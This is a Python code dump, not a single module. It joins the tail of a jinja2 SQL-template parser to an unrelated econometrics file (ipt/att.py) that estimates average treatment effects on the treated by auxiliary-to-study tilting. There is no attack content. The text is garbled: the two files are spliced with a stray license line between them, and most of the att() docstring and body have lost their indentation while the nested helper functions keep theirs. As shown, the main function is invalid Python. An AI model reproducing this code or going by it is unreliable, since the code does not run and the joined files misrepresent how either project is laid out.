        "gather non-empty tokens from every line matched by pattern"
        found = []
        for line in pattern.findall(content):
            found.extend(tok for tok in self.split_token(line) if tok)
        return found

    def list_dependencies(self, content):
        "return list of dependencies found on content DEPS lines"
        return self._collect(self._extractDEPS, content)

    def list_variables(self, content):
        "return list of variables definition found on content VARS lines"
        return self._collect(self._extractVARS, content)

    def cleanup_deps_and_vars(self, content):
        "remove DEPS and VARS lines from content"
        without_deps = self._isDEPSLine.sub('', content)
        return self._isVARSLine.sub('', without_deps).strip()

    def compile_template(self, content):
        "return template string and default context..."
        defaultCtx = {}
        tplString = self.cleanup_deps_and_vars(content)
        for vardef in self.list_variables(content):
            m = self._extractVarDef.match(vardef)
            if m is None:
                raise ValueError("Invalid VARS token : %s"%vardef)
            tok, repl = m.groups()
            # A bare "name" definition maps the token onto itself.
            repl = tok if repl is None else repl
            defaultCtx[repl] = tok
            # Replace whole-word occurrences of the token with a jinja2
            # placeholder (raw string keeps \b a word boundary).
            tplString = re.sub(r"\b%s\b" % tok, "{{%s}}" % repl, tplString)
        return tplString, defaultCtx

    def __call__(self, content):
        "parse content and return dependencies, defaults, tplstring..."
        tplstring, defaults = self.compile_template(content)
        return (self.list_dependencies(content), tplstring, defaults)
def render_resource(fpath, parser=None, **kwargs):
    """Render the single SQL file at `fpath` as a jinja2 template.

    `parser` defaults to a fresh ContentParser; keyword arguments
    override the default variable context extracted from VARS lines.
    """
    # Read the raw file content.
    with open(abspath(fpath)) as f:
        content = f.read()

    # Prepare parser.
    parse = parser or ContentParser()
    if not callable(parse):
        raise ValueError("Invalid parser !")

    # Compile the resource template with line statements enabled.
    env = Environment(line_statement_prefix='--#')
    deps, tplstr, defaults = parse(content)

    # Rendering context: defaults overridden by caller-supplied values.
    rendering_ctx = dict(defaults)
    rendering_ctx.update(kwargs)
    return env.from_string(tplstr).render(rendering_ctx)
| mit |
bryangraham/ipt | ipt/att.py | 1 | 39159 | # Load library dependencies
import numpy as np
import numpy.linalg
import scipy as sp
import scipy.optimize
import scipy.stats
import pandas as pd
# Import logit() command in ipt module since att() calls it
from .logit import logit
# Define att() function
#-----------------------------------------------------------------------------#
def att(D, Y, r_W, t_W, study_tilt=True, rlgrz=1, s_wgt=None, nocons=False, c_id=None, silent=False):
"""
AUTHOR: Bryan S. Graham, UC - Berkeley, bgraham@econ.berkeley.edu
DATE: Python 2.7 code on 26 May 2016, updated for Python 3.6 on 15 July 2018
This function estimates the average treatment effect on the treated (ATT)
using the "auxiliary-to-study tilting" (AST) method described by
Graham, Pinto and Egel (2016, Journal of Business and Economic Statistics).
The notation below mirrors that in the paper where possible. The Supplemental
Web Appendix of the paper describes the estimation algorithm implemented here
in detail. A copy of the paper and all supplemental appendices can be found
online at http://bryangraham.github.io/econometrics/
INPUTS
------
D : N x 1 pandas.Series with ith element equal to 1 if ith unit in the merged
sample is from the study population and zero if from the auxiliary
population (i.e., D is the "treatment" indicator)
Y : N x 1 pandas.Series of observed outcomes
r_W : r(W), N x 1+L pandas.DataFrame of functions of always observed covariates
-- these are the propensity score basis functions
t_W : t(W), N x 1+M pandas.DataFrame of functions of always observed covariates
-- these are the balancing functions
study_tilt: If True compute the study sample tilt. This should be set to False
if all the elements in t(W) are also contained in h(W). In that
case the study_tilt coincides with its empirical measure.This
measure is returned in the pi_s vector when study_tilt = False.
rlgrz : Regularization parameter. Should positive and less than or equal
to one. Smaller values correspond to less regularizations, but
may cause underflow problems when overlap is poor. The default
value will be adequate for most applications.
s_wgt : N x 1 pandas.Series of sampling weights variable (optional)
nocons : If True, then do NOT add constant to h_W and t_W matrix
(only set to True if user passes in dataframes with constants included)
c_id : N X 1 pandas.Series of unique `cluster' id values (assumed to be integer valued) (optional)
NOTE: Default is to assume independent observations and report heteroscedastic robust
standard errors
NOTE: Data are assumed to be pre-sorted by groups.
silent : if silent = True display less optimization information and use
lower tolerance levels (optional)
OUTPUTS
-------
gamma_ast : AST estimate of gamma (the ATT)
vcov_gamma_ast : estimated large sample variance of gamma
pscore_tests : list of [study_test, auxiliary_test] where
study_test : ChiSq test statistic of H0 : lambda_s = 0; list with
[statistic, dof, p-val]
NOTE: returns [None, None, None] if study_tilt = False
auxiliary_test : ChiSq test statistic of H0 : lambda_a = 0; list with
[statistic, dof, p-val]
tilts : numpy array with pi_eff, pi_s & pi_a as columns, sorted according
to the input data, and where
pi_eff : Semiparametrically efficient estimate of F_s(W)
pi_s : Study sample tilt
pi_a : Auxiliary sample tilt
exitflag : 1 = success, 2 = can't compute MLE of p-score, 3 = can't compute study/treated tilt,
4 = can't compute auxiliary/control tilt
FUNCTIONS CALLED : logit() (...logit_logl(), logit_score(), logit_hess()...)
---------------- ast_crit(), ast_foc(), ast_soc() (...ast_phi()...)
"""
    def ast_phi(lmbda, t_W, p_W_index, NQ, rlgrz):
        """
        This function evaluates the regularized phi(v) function for
        the logit propensity score case (as well as its first and
        second derivatives) as described in the Supplemental
        Web Appendix of Graham, Pinto and Egel (2016, JBES).

        INPUTS
        ------
        lmbda     : vector of tilting parameters
        t_W       : vector of balancing moments
        p_W_index : index of estimated logit propensity score
        NQ        : sample size times the marginal probability of missingness
        rlgrz     : Regularization parameter. See discussion in main header.

        OUTPUTS
        -------
        phi, phi1, phi2 : N x 1 vectors with elements phi(p_W_index + lmbda't_W)
                          and its first and second derivatives w.r.t to
                          v = p_W_index + lmbda't_W
        """
        # Adjust the NQ cut-off value used for quadratic extrapolation according
        # to the user-defined rlgrz parameter
        NQ = NQ*rlgrz
        # Coefficients on quadratic extrapolation of phi(v) used to regularize
        # the problem: for v <= v_star, phi is replaced by the quadratic
        # a + b*v + c*v^2/2 (a, b, c chosen to match the function at the
        # switch point; presumably this makes phi C^2 at v_star — the
        # construction mirrors the paper's appendix).
        c = -(NQ - 1)
        b = NQ + (NQ - 1)*np.log(1/(NQ - 1))
        a = -(NQ - 1)*(1 + np.log(1/(NQ - 1)) + 0.5*(np.log(1/(NQ - 1)))**2)
        v_star = np.log(1/(NQ - 1))
        # Evaluation of phi(v) and derivatives. The boolean masks
        # (v>v_star)/(v<=v_star) blend the exact branch v - exp(-v) with
        # the quadratic branch elementwise, without explicit loops.
        # NOTE: np.exp(-v) is still evaluated for all elements; the
        # quadratic branch protects the *result*, not the evaluation,
        # from extreme v.
        v = p_W_index + t_W @ lmbda
        phi = (v>v_star) * (v - np.exp(-v)) + (v<=v_star) * (a + b*v + 0.5*c*v**2)
        phi1 = (v>v_star) * (1 + np.exp(-v)) + (v<=v_star) * (b + c*v)
        phi2 = (v>v_star) * ( - np.exp(-v)) + (v<=v_star) * c
        return [phi, phi1, phi2]
    def ast_crit(lmbda, D, p_W, p_W_index, t_W, NQ, rlgrz, s_wgt):
        """
        This function constructs the AST criterion function
        as described in Graham, Pinto and Egel (2016, JBES).

        INPUTS
        ------
        lmbda     : vector of tilting parameters
        D         : N x 1 treatment indicator vector
        p_W       : N x 1 MLEs of the propensity score
        p_W_index : index of estimated logit propensity score
        t_W       : vector of balancing moments
        NQ        : sample size times the marginal probability of missingness
        rlgrz     : Regularization parameter. See discussion in main header.
        s_wgt     : N x 1 vector of known sampling weights (optional)

        OUTPUTS
        -------
        crit : AST criterion function at passed parameter values

        Functions called : ast_phi()
        """
        lmbda = np.reshape(lmbda,(-1,1)) # make lmda 2-dimensional object
        [phi, phi1, phi2] = ast_phi(lmbda, t_W, p_W_index, NQ, rlgrz) # compute phi and 1st/2nd derivatives
        # Negated so that a numerical *minimizer* maximizes the tilting
        # objective (presumably consumed by scipy.optimize downstream).
        crit = -np.sum(s_wgt * (D * phi - (t_W @ lmbda)) * (p_W / NQ)) # AST criterion (scalar)
        return crit
    def ast_foc(lmbda, D, p_W, p_W_index, t_W, NQ, rlgrz, s_wgt):
        """
        Returns first derivative vector of AST criterion function with respect
        to lmbda. See the header for ast_crit() for description of parameters.
        """
        lmbda = np.reshape(lmbda,(-1,1)) # make lmda 2-dimensional object
        [phi, phi1, phi2] = ast_phi(lmbda, t_W, p_W_index, NQ, rlgrz) # compute phi and 1st/2nd derivatives
        foc = -(t_W.T @ (s_wgt * (D * phi1 - 1) * (p_W / NQ))) # AST gradient (1+M x 1 vector)
        # Flattened to 1-D because gradient-based optimizers expect a
        # flat array matching the shape of the parameter vector.
        foc = np.ravel(foc) # make foc 1-dimensional numpy array
        return foc
    def ast_soc(lmbda, D, p_W, p_W_index, t_W, NQ, rlgrz, s_wgt):
        """
        Returns hessian matrix of AST criterion function with respect
        to lmbda. See the header for ast_crit() for description of parameters.
        """
        lmbda = np.reshape(lmbda,(-1,1)) # make lmda 2-dimensional object
        [phi, phi1, phi2] = ast_phi(lmbda, t_W, p_W_index, NQ, rlgrz) # compute phi and 1st/2nd derivatives
        soc = -(((s_wgt * D * phi2 * (p_W / NQ)) * t_W).T @ t_W) # AST hessian (note use of numpy broadcasting rules)
                                                                 # (1 + M) x (1 + M) "matrix" (numpy array)
        # NOTE(review): the hessian is returned wrapped in a one-element
        # list, unlike ast_foc which returns a bare array — confirm the
        # downstream consumer (not visible in this chunk) expects a list.
        return [soc]
    def ast_study_callback(lmbda):
        # Optimizer progress callback for the study-sample tilt: prints the
        # current criterion value and the 2-norm of its gradient. Closes
        # over Ds, t_Ws, NQ, rlgrz, sw and (bound later in att(), beyond
        # this point in the file) p_W and p_W_index.
        print("Value of ast_crit = " + "%.6f" % ast_crit(lmbda, Ds, p_W, p_W_index, t_Ws, NQ, rlgrz, sw) + \
              ", 2-norm of ast_foc = "+ "%.6f" % numpy.linalg.norm(ast_foc(lmbda, Ds, p_W, p_W_index, t_Ws, \
              NQ, rlgrz, sw)))

    def ast_auxiliary_callback(lmbda):
        # Same as ast_study_callback, but for the auxiliary-sample tilt:
        # treatment indicator flipped (1-Ds) and the p-score index negated.
        print("Value of ast_crit = " + "%.6f" % ast_crit(lmbda, 1-Ds, p_W, -p_W_index, t_Ws, NQ, rlgrz, sw) + \
              ", 2-norm of ast_foc = "+ "%.6f" % numpy.linalg.norm(ast_foc(lmbda, 1-Ds, p_W, -p_W_index, t_Ws, \
              NQ, rlgrz, sw)))
# ----------------------------------------------------------------------------------- #
# - STEP 1 : ORGANIZE DATA - #
# ----------------------------------------------------------------------------------- #
# Extract variable names from pandas data objects
dep_var = Y.name # Get dependent variable names
r_W_names = list(r_W.columns) # Get r_W variable names
t_W_names = list(t_W.columns) # Get t_W variable names
# Create pointers to pandas objects transformed into appropriately sized numpy arrays
Ds = D.values.reshape((-1,1)) # Turn pandas.Series into N x 1 numpy array
Ys = Y.values.reshape((-1,1)) # Turn pandas.Series into N x 1 numpy array
r_Ws = r_W.values # Turn pandas.DataFrame into N x 1 + L numpy array
t_Ws = t_W.values # Turn pandas.DataFrame into N x 1 + M numpy array
# Extract basic information and set-up AST problem
N = len(D) # Number of units in sample
Ns = np.sum(D) # Number of study units in the sample (treated units)
Na = N-Ns # Number of auxiliary units in the sample (control units)
M = np.shape(t_Ws)[1]
L = np.shape(r_Ws)[1]
if nocons:
M = M - 1 # Dimension of t_W (excluding constant)
L = L - 1 # Dimension of r_W (excluding constant)
DY = Ds * Ys # D*Y, N x 1 vector of observed outcomes for treated/study units
mDX = (1-Ds) * Ys # (1-D)*X, N x 1 vector of observed outcomes for non-treated/auxiliary units
# Add a constant to the regressor matrix (if needed)
if not nocons:
r_Ws = np.concatenate((np.ones((N,1)), r_Ws), axis=1)
r_W_names = ['constant'] + r_W_names
t_Ws = np.concatenate((np.ones((N,1)), t_Ws), axis=1)
t_W_names = ['constant'] + t_W_names
# Normalize weights to have mean one (if needed)
if s_wgt is None:
sw = 1
else:
s_wgt_var = s_wgt.name # Get sample weight variable name
sw = np.asarray(s_wgt/s_wgt.mean()).reshape((-1,1)) # Normalized sampling weights with mean one
# ----------------------------------------------------------------------------------- #
# - STEP 2 : ESTIMATE PROPENSITY SCORE PARAMETER BY LOGIT ML - #
# ----------------------------------------------------------------------------------- #
try:
if not silent:
print("")
print("--------------------------------------------------------------")
print("- Computing propensity score by MLE -")
print("--------------------------------------------------------------")
# CMLE of p-score coefficients
[delta_ml, vcov_delta_ml, hess_logl, score_i, p_W, _] = \
logit(D, r_W, s_wgt=s_wgt, nocons=nocons, \
c_id=c_id, silent=silent, full=False)
delta_ml = np.reshape(delta_ml,(-1,1)) # Put delta_ml into 2-dimensional form
p_W_index = r_Ws @ delta_ml # Fitted p-score index
NQ = np.sum(sw * p_W) # Sum of fitted p-scores
pi_eff = (sw * p_W) / NQ # Efficient estimate of F(W)
except:
print("FATAL ERROR: exitflag = 2, unable to compute propensity score by maximum likelihood.")
# Set all returnables to "None" and then exit function
gamma_ast = None
vcov_gamma_ast = None
pscore_tests = None
tilts = None
exitflag = 2
return [gamma_ast, vcov_gamma_ast, pscore_tests, tilts, exitflag]
# ----------------------------------------------------------------------------------- #
# - STEP 3 : SOLVE FOR AST TILTING PARAMETERS - #
# -----------------------------------------------------------------------------------
# Set optimization parameters
if silent:
# Use Newton-CG solver with vector of zeros as starting values,
# low tolerance levels, and smaller number of allowed iterations.
# Hide iteration output.
options_set = {'xtol': 1e-8, 'maxiter': 1000, 'disp': False}
else:
# Use Newton-CG solver with vector of zeros as starting values,
# high tolerance levels, and larger number of allowed iterations.
# Show iteration output.
options_set = {'xtol': 1e-12, 'maxiter': 10000, 'disp': True}
lambda_sv = np.zeros(1+M) # use vector of zeros as starting values
#------------------------------#
#- STUDY TILT -#
#------------------------------#
# NOTE: Only compute the study_tilt if directed to do so (this is the default). The study_tilt
# doesn't need to be computed if all the elements of t(W) are also included in h(W). It
# is the users responsibility to check this condition.
if study_tilt:
# -------------------------------------------------- #
# - CASE 1: Non-trivial study sample tilt required - #
# -------------------------------------------------- #
# Compute lamba_s_hat (study or treated sample tilting parameters)
try:
if not silent:
print("")
print("--------------------------------------------------------------")
print("- Computing study/treated sample tilt -")
print("--------------------------------------------------------------")
# Derivative check at starting values
grad_norm = sp.optimize.check_grad(ast_crit, ast_foc, lambda_sv, Ds, p_W, \
p_W_index, t_Ws, NQ, rlgrz, \
sw, epsilon = 1e-12)
print('Study sample tilt derivative check (2-norm): ' + "%.8f" % grad_norm)
# Solve for tilting parameters
lambda_s_res = sp.optimize.minimize(ast_crit, lambda_sv, args=(Ds, p_W, p_W_index, \
t_Ws, NQ, rlgrz, sw), \
method='Newton-CG', jac=ast_foc, hess=ast_soc, \
callback = ast_study_callback, options=options_set)
else:
# Solve for tilting parameters
lambda_s_res = sp.optimize.minimize(ast_crit, lambda_sv, args=(Ds, p_W, p_W_index, \
t_Ws, NQ, rlgrz, sw), \
method='Newton-CG', jac=ast_foc, hess=ast_soc, \
options=options_set)
except:
print("FATAL ERROR: exitflag = 3, Unable to compute the study/treated vector of tilting parameters.")
# Set all returnables to "None" and then exit function
gamma_ast = None
vcov_gamma_ast = None
pscore_tests = None
tilts = None
exitflag = 3
return [gamma_ast, vcov_gamma_ast, pscore_tests, tilts, exitflag]
# Collect study tilt estimation results needed below
lambda_s_hat = np.reshape(lambda_s_res.x,(-1,1)) # study/treated sample tilting
# parameter estimates
p_W_s = (1+np.exp(-(p_W_index) - (t_Ws @ lambda_s_hat)))**-1 # study/treated sample tilted p-score
pi_s = Ds * pi_eff / p_W_s # study/treated sample tilt
else:
# ------------------------------------------ #
# - CASE 2: Study sample tilt NOT required - #
# ------------------------------------------ #
if not silent:
print("")
print("----------------------------------------------------------------------")
print("- Tilt of study sample not requested by user (study_tilt = False). -")
print("- Validity of this requires all elements of t(W) to be elements of -")
print("- h(W) as well. User is advised to verify this condition. -")
print("----------------------------------------------------------------------")
print("")
# Collect study tilt objects needed below
lambda_s_hat = np.reshape(lambda_sv ,(-1,1)) # study/treated sample tilting parameters set equal to zero
p_W_s = p_W # study/treated sample tilted p-score equals actual score
pi_s = Ds * pi_eff / p_W_s # set pi_s to "empirical measure" of study sub-sample
# (w/o sampling weights this puts mass 1/Ns on each study unit)
#------------------------------#
#- AUXILIARY TILT -#
#------------------------------#
# Compute lamba_a_hat (auxiliary or control sample tilting parameters)
try:
if not silent:
print("")
print("--------------------------------------------------------------")
print("- Computing auxiliary/control sample tilt -")
print("--------------------------------------------------------------")
# Derivative check at starting values
grad_norm = sp.optimize.check_grad(ast_crit, ast_foc, lambda_sv, 1-Ds, p_W, \
-p_W_index, t_Ws, NQ, rlgrz, \
sw, epsilon = 1e-12)
print('Auxiliary sample tilt derivative check (2-norm): ' + "%.8f" % grad_norm)
# Solve for tilting parameters
lambda_a_res = sp.optimize.minimize(ast_crit, lambda_sv, args=(1-Ds, p_W, -p_W_index, \
t_Ws, NQ, rlgrz, sw), \
method='Newton-CG', jac=ast_foc, hess=ast_soc, \
callback = ast_auxiliary_callback, options=options_set)
else:
# Solve for tilting parameters
lambda_a_res = sp.optimize.minimize(ast_crit, lambda_sv, args=(1-Ds, p_W, -p_W_index, \
t_Ws, NQ, rlgrz, sw), \
method='Newton-CG', jac=ast_foc, hess=ast_soc, \
options=options_set)
except:
print("FATAL ERROR: exitflag = 4, Unable to compute the auxiliary/control vector of tilting parameters.")
# Set returnables to "None" and then exit function
gamma_ast = None
vcov_gamma_ast = None
pscore_tests = None
tilts = None
exitflag = 4
return [gamma_ast, vcov_gamma_ast, pscore_tests, tilts, exitflag]
# Collect auxiliary tilt estimation results needed below
lambda_a_hat = -np.reshape(lambda_a_res.x,(-1,1)) # auxiliary/control sample tilting
# parameter estimates
p_W_a = (1+np.exp(-(p_W_index) - (t_Ws @ lambda_a_hat)))**-1 # auxiliary sample tilted p-score
pi_a = (1-Ds) * (pi_eff / (1-p_W_a)) # auxiliary sample tilt
# ----------------------------------------------------------------------------------- #
# - STEP 4 : SOLVE FOR AST ESTIMATE OF GAMMA (i.e., ATT) - #
# ----------------------------------------------------------------------------------- #
# AST estimate of gamma -- the ATT %
gamma_ast = np.sum(sw * p_W * ((Ds / p_W_s) * DY - (1-Ds) / (1-p_W_a) * mDX))/NQ;
# ----------------------------------------------------------------------------------- #
# - STEP 5 : FORM LARGE SAMPLE VARIANCE-COVARIANCE ESTIMATES - #
# ----------------------------------------------------------------------------------- #
# Form moment vector corresponding to full three step procedure
m1 = (sw * (Ds - p_W) * r_Ws).T # 1+L x N matrix of m_1 moments (logit scores)
m2 = (sw * ((1 - Ds) / (1 - p_W_a) - 1) * p_W * t_Ws).T # 1+M x N matrix of m_2 moments
m3 = (sw * (Ds / p_W_s - 1) * p_W * t_Ws).T # 1+M x N matrix of m_3 moments
m4 = (sw * p_W * ((Ds / p_W_s) * DY - ((1-Ds) / (1-p_W_a)) * (mDX+gamma_ast))).T # 1 x N matrix of m_4 moments
m = np.concatenate((m1, m2, m3, m4), axis=0) # 1 + L + 2(1 + M) + 1 x N matrix of all moments
# Calculate covariance matrix of moment vector. Take into account any
# within-group dependence/clustering as needed
if c_id is None:
# Case 1: No cluster dependence to account for when constructing covariance matrix
C = N # Number of clusters equals number of observations
fsc = N/(N - (1+L+2*(1+M)+1)) # Finite-sample correction factor
V_m = fsc*(m @ m.T)/N
else:
# Case 2: Need to correct for cluster dependence when constructing covariance matrix
# Get number and unique list of clusters
c_list = np.unique(c_id)
C = len(c_list)
# Calculate cluster-robust variance-covariance matrix of m
# Sum moment vector within clusters
sum_m = np.empty((C,1+L+2*(1+M)+1)) # initiate vector of cluster-summed moments
for c in range(0,C):
# sum of moments for units in c-th cluster
b_cluster = np.nonzero((c_id == c_list[c]))[0] # Observations in c-th cluster
sum_m[c,:] = np.sum(m[np.ix_(range(0,1+L+2*(1+M)+1), b_cluster)], axis = 1) # Sum over "columns" within c-th cluster
# Compute variance-covariance matrix of moment vector
fsc = (N/(N - (1+L+2*(1+M)+1)))*(C/(C-1)) # Finite-sample correction factor
V_m = fsc*(sum_m.T @ sum_m)/C # Variance-covariance of the summed moments
# Form Jacobian matrix for entire parameter: theta = (rho, delta, lambda, gamma)
e_V = np.exp(np.dot(r_Ws, delta_ml))
e_Va = np.exp(np.dot(r_Ws, delta_ml) + np.dot(t_Ws, lambda_a_hat))
e_Vs = np.exp(np.dot(r_Ws, delta_ml) + np.dot(t_Ws, lambda_s_hat))
M1_delta = np.dot((sw * (- e_V / (1 + e_V)**2) * r_Ws).T, r_Ws)/N # 1 + L x 1 + L
M2_delta = np.dot((sw * ((1 - Ds) / (1 - p_W_a) - 1) * (e_V / (1 + e_V)**2) * t_Ws).T, r_Ws)/N # 1 + M x 1 + L
M3_delta = np.dot((sw * (Ds / p_W_s - 1) * (e_V / (1 + e_V)**2) * t_Ws).T, r_Ws)/N # 1 + M x 1 + L
M4_delta = np.dot((sw * (e_V / (1 + e_V)**2) * \
((Ds / p_W_s) * DY - ((1 - Ds) / (1 - p_W_a)) * (mDX + gamma_ast))).T, r_Ws)/N # 1 x 1 + L
M2_lambda_a = np.dot(( sw * ((1 - Ds) / (1 - p_W_a)**2) * p_W * (e_Va / (1 + e_Va)**2) * t_Ws).T, t_Ws)/N # 1 + M x 1 + M
M4_lambda_a = np.dot((-sw * ((1 - Ds) / (1 - p_W_a)**2) * p_W * (mDX+gamma_ast) * (e_Va / (1 + e_Va)**2)).T, t_Ws)/N # 1 x 1 + M
M3_lambda_s = np.dot((-sw * (Ds / p_W_s**2) * p_W * (e_Vs / (1 + e_Vs)**2) * t_Ws).T, t_Ws)/N # 1 + M x 1 + M
M4_lambda_s = np.dot((-sw * (Ds / p_W_s**2) * p_W * DY * (e_Vs / (1 + e_Vs)**2)).T, t_Ws)/N # 1 x 1 + M
M4_gamma = -(NQ/N).reshape(1,1) # 1 x 1
M1 = np.hstack((M1_delta, np.zeros((1+L,1+M)), np.zeros((1+L,1+M)), np.zeros((1+L,1))))
M2 = np.hstack((M2_delta, M2_lambda_a, np.zeros((1+M,1+M)), np.zeros((1+M,1))))
M3 = np.hstack((M3_delta, np.zeros((1+M,1+M)), M3_lambda_s, np.zeros((1+M,1))))
M4 = np.hstack((M4_delta, M4_lambda_a, M4_lambda_s, M4_gamma))
# Concatenate Jacobian and compute inverse
M_hat = (N/C)*np.vstack((M1, M2, M3, M4))
iM_hat = np.linalg.inv(M_hat)
# Compute sandwich variance estimates
vcov_theta_ast = (iM_hat @ V_m @ iM_hat.T)/C
vcov_gamma_ast = vcov_theta_ast[-1,-1]
exitflag = 1 # AST estimate of the ATT successfully computed!
# ----------------------------------------------------------------------------------- #
# - STEP 6 : COMPUTE TEST STATISTICS BASED ON TILTING PARAMETER - #
# ----------------------------------------------------------------------------------- #
# Compute propensity score specification test based on study tilt (if applicable)
if study_tilt:
iV_lambda_s = np.linalg.inv(vcov_theta_ast[1+L:1+L+1+M,1+L:1+L+1+M])
ps_test_st = np.dot(np.dot(lambda_s_hat.T, iV_lambda_s), lambda_s_hat)
dof_st = len(lambda_s_hat)
pval_st = 1 - sp.stats.chi2.cdf(ps_test_st[0,0], dof_st)
study_test = [ps_test_st[0,0], dof_st, pval_st]
else:
study_test = [None, None, None]
# Compute propensity score specification test based on auxiliary tilt (always done)
iV_lambda_a = np.linalg.inv(vcov_theta_ast[1+L+1+M:1+L+1+M+1+M,1+L+1+M:1+L+1+M+1+M])
ps_test_at = np.dot(np.dot(lambda_a_hat.T, iV_lambda_a), lambda_a_hat)
dof_at = len(lambda_a_hat)
pval_at = 1 - sp.stats.chi2.cdf(ps_test_at[0,0], dof_at)
auxiliary_test = [ps_test_at[0,0], dof_at, pval_at]
# ----------------------------------------------------------------------------------- #
# - STEP 7 : DISPLAY RESULTS - #
# ----------------------------------------------------------------------------------- #
if not silent:
print("")
print("-------------------------------------------------------------------------------------------")
print("- Auxiliary-to-Study (AST) estimates of the ATT -")
print("-------------------------------------------------------------------------------------------")
print("ATT: " + "%10.6f" % gamma_ast)
print(" (" + "%10.6f" % np.sqrt(vcov_gamma_ast) + ")")
print("")
print("-------------------------------------------------------------------------------------------")
if c_id is None:
print("NOTE: Outcome variable = " + dep_var)
print(" Heteroscedastic-robust standard errors reported")
print(" N1 = " "%0.0f" % Ns + ", N0 = " + "%0.0f" % Na)
else:
print("NOTE: Outcome variable = " + dep_var)
print(" Cluster-robust standard errors reported")
print(" Cluster-variable = " + c_id.name)
print(" Number of clusters = " + "%0.0f" % C)
print(" N1 = " "%0.0f" % Ns + ", N0 = " + "%0.0f" % Na)
if s_wgt is not None:
print("NOTE: (Sampling) Weighted AST estimates computed.")
print(" Weight-variable = " + s_wgt_var)
print("")
print("-------------------------------------------------------------------------------------------")
print("- Maximum likelihood estimates of the p-score -")
print("-------------------------------------------------------------------------------------------")
print("")
print("Independent variable Coef. ( Std. Err.) ")
print("-------------------------------------------------------------------------------------------")
c = 0
for names in r_W_names:
print(names.ljust(25) + "%10.6f" % delta_ml[c] + \
" (" + "%10.6f" % np.sqrt(vcov_theta_ast[c,c]) + ")")
c += 1
print("")
print("-------------------------------------------------------------------------------------------")
print("- Tilting parameter estimates -")
print("-------------------------------------------------------------------------------------------")
if study_tilt:
print("")
print("TREATED (study) sample tilt")
print("-------------------------------------------------------------------------------------------")
print("")
print("Independent variable Coef. ( Std. Err.) ")
print("-------------------------------------------------------------------------------------------")
c = 0
for names in t_W_names:
print(names.ljust(25) + "%10.6f" % lambda_s_hat[c] + \
" (" + "%10.6f" % np.sqrt(vcov_theta_ast[1+L+c,1+L+c]) + ")")
c += 1
print("")
print("Specification test for p-score (H_0 : lambda_s = 0)")
print("-------------------------------------------------------------------------------------------")
print("chi-square("+str(dof_st)+") = " + "%10.6f" % ps_test_st + " p-value: " + "% .6f" % pval_st)
print("")
print("Summary statistics study/treated re-weighting")
print("-------------------------------------------------------------------------------------------")
j = np.where(D)[0] # find indices of treated units
N_s_eff = 1/np.sum(pi_s[j]**2) # Kish's formula for effective sample size
print("Kish's effective study/treated sample size = " "%0.0f" % N_s_eff)
print("")
print("Percentiles of N_s * pi_s distribution")
quantiles = [1, 5, 10, 25, 50, 75, 90, 95, 99]
qnt_pi_s = np.percentile(Ns*pi_s[j],quantiles)
c = 0
for q in quantiles:
print("%2.0f" % quantiles[c] + " percentile = " "%2.4f" % qnt_pi_s[c])
c += 1
else:
print("")
print("--------------------------------------------------------")
print("- NOTE: Study tilt not computed (study_tilt = False). -")
print("- Components of t(W) assumed to be also in h(W). -")
print("--------------------------------------------------------")
print("")
print("")
print("CONTROL (auxiliary) sample tilt")
print("-------------------------------------------------------------------------------------------")
print("")
print("Independent variable Coef. ( Std. Err.) ")
print("-------------------------------------------------------------------------------------------")
c = 0
for names in t_W_names:
print(names.ljust(25) + "%10.6f" % lambda_a_hat[c] + \
" (" + "%10.6f" % np.sqrt(vcov_theta_ast[1+L+1+M+c,1+L+1+M+c]) + ")")
c += 1
print("")
print("Specification test for p-score (H_0 : lambda_a = 0)")
print("-------------------------------------------------------------------------------------------")
print("chi-square("+str(dof_at)+") = " + "%10.6f" % ps_test_at + " p-value: " + "% .6f" % pval_at)
print("")
print("Summary statistics auxiliary/control re-weighting")
print("-------------------------------------------------------------------------------------------")
j = np.where(1-D)[0] # find indices of control units
N_a_eff = 1/np.sum(pi_a[j]**2) # Kish's formula for effective sample size
print("Kish's effective auxiliary/control sample size = " "%0.0f" % N_a_eff)
print("")
print("Percentiles of N_a * pi_a distribution")
quantiles = [1, 5, 10, 25, 50, 75, 90, 95, 99]
qnt_pi_a = np.percentile(Na*pi_a[j],quantiles)
c = 0
for q in quantiles:
print("%2.0f" % quantiles[c] + " percentile = " "%2.4f" % qnt_pi_a[c])
c += 1
# ------------------------------------------- #
# Construct "exact balancing" table - #
# ------------------------------------------- #
Na_wgt = np.sum(sw * (1-Ds) , axis = 0)
Ns_wgt = np.sum(sw * Ds , axis = 0)
# Compute means of t_W across various distribution function estimates
# Mean of t(W) across controls
mu_t_D0 = np.sum(sw * (1-Ds) * t_Ws, axis = 0)/Na_wgt
mu_t_D0_std = np.sqrt(np.sum(sw * (1-Ds) * (t_Ws - mu_t_D0)**2, axis = 0)/Na_wgt)
# Mean of t(W) across treated
mu_t_D1 = np.sum(sw * Ds * t_Ws, axis = 0)/Ns_wgt
mu_t_D1_std = np.sqrt(np.sum(sw * Ds * (t_Ws - mu_t_D1)**2, axis = 0)/Ns_wgt)
# Normalized mean differences across treatment and controls
# (cf., Imbens, 2015, Journal of Human Resources)
NormDif_t = (mu_t_D1 - mu_t_D0)/np.sqrt((mu_t_D1_std**2 + mu_t_D0_std**2)/2)
# Semiparametrically efficient estimate of mean of t(W) across treated
mu_t_eff = np.sum(pi_eff * t_Ws, axis = 0)
mu_t_eff_std = np.sqrt(np.sum(pi_eff * (t_Ws - mu_t_eff)**2, axis = 0))
# Mean of t(W) across controls after re-weighting
mu_t_a = np.sum(pi_a * t_Ws, axis = 0)
mu_t_a_std = np.sqrt(np.sum(pi_a * (t_Ws - mu_t_a)**2, axis = 0))
# Mean of t(W) across treated after re-weighting
mu_t_s = np.sum(pi_s * t_Ws, axis = 0)
mu_t_s_std = np.sqrt(np.sum(pi_s * (t_Ws - mu_t_s)**2, axis = 0))
# Pre-balance table
print("")
print("Means & standard deviations of t_W (pre-balance) ")
print("-------------------------------------------------------------------------------------------")
print(" Treated (D = 1) Control (D = 0) Norm. Diff. ")
print("-------------------------------------------------------------------------------------------")
c = 0
for names in t_W_names:
print(names.ljust(25) + "%8.4f" % mu_t_D1[c] + " (" + "%8.4f" % mu_t_D1_std[c] + ") " \
+ "%8.4f" % mu_t_D0[c] + " (" + "%8.4f" % mu_t_D0_std[c] + ") " \
+ "%8.4f" % NormDif_t[c])
c += 1
# Post-balance table
print("")
print("Means and standard deviations of t_W (post-balance) ")
print("-------------------------------------------------------------------------------------------")
print(" Treated (D = 1) Control (D = 0) Efficient (D = 1)")
print("-------------------------------------------------------------------------------------------")
c = 0
for names in t_W_names:
